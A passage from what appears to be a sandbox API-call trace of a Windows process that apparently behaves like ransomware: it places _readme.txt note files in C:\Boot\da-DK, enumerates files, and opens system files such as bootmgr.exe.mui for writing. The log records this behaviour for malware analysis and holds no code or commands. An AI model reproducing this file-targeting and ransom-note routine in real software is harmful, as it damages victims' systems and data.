[0093.014] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0093.014] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.015] PathFindFileNameW (pszPath="") returned="" [0093.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.015] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.015] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0093.015] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99c9c68 [0093.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.016] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0093.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x81c) returned 0x99c9c68 [0093.017] PathAppendW (in: pszPath="C:\\Boot\\da-DK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 1 [0093.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.017] PathFileExistsW (pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 1 [0093.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.018] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3267ea0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3267ea0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0093.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.018] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3267ea0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3267ea0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.018] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0093.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.018] PathFindExtensionW (pszPath="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned=".mui" [0093.018] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31758b8 | out: hHeap=0x680000) returned 1 [0093.018] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3267ea0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3267ea0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3267ea0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0093.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.018] PathFindExtensionW (pszPath="C:\\Boot\\da-DK\\_readme.txt") returned=".txt" [0093.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31758b8 | out: hHeap=0x680000) returned 1 [0093.018] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3267ea0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3267ea0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3267ea0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.018] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0093.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef540 | out: hHeap=0x680000) returned 1 [0093.019] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0093.019] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef540 [0093.019] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0093.019] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.019] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.019] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.019] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.019] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.019] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.019] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.019] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.019] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.019] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.019] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.019] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.019] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.019] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.019] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.020] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.020] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.020] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.020] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.020] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.020] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.020] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.020] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.020] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.020] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.020] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.020] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.020] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.020] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.020] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.020] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.020] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.020] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.020] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.020] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.020] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.020] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.020] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.020] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.020] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.020] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.020] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.020] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.020] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.020] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.020] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.020] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.020] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.020] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.020] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.021] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.021] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.021] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.021] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.021] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.021] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.021] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.021] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.021] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.021] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.021] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.021] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.021] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.021] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.021] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.021] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.021] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.021] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.021] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.021] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.021] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.021] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.021] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.021] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.021] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.021] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.021] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.021] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.021] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.021] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.021] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.021] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.021] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.021] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.021] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.021] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.022] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.022] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.022] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.022] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.022] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.022] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.022] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.022] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.022] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.022] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.022] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.022] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.022] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.022] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.022] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.022] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.022] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.022] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.022] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.022] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.022] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.022] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.022] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.022] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.022] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.022] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.022] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.022] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.022] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.022] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.022] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.022] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.022] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.022] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.022] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.023] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.023] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.023] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.023] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.023] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.023] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.023] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.023] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.023] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.023] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.023] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.023] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.023] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.023] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.023] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.023] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.023] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.023] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.023] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.023] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.023] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.023] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.023] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.023] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.023] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.023] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.023] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.023] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.023] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.023] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.023] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.023] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.023] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.023] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.023] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.023] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.023] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.024] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.024] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.024] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.024] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.024] RtlAllocateHeap 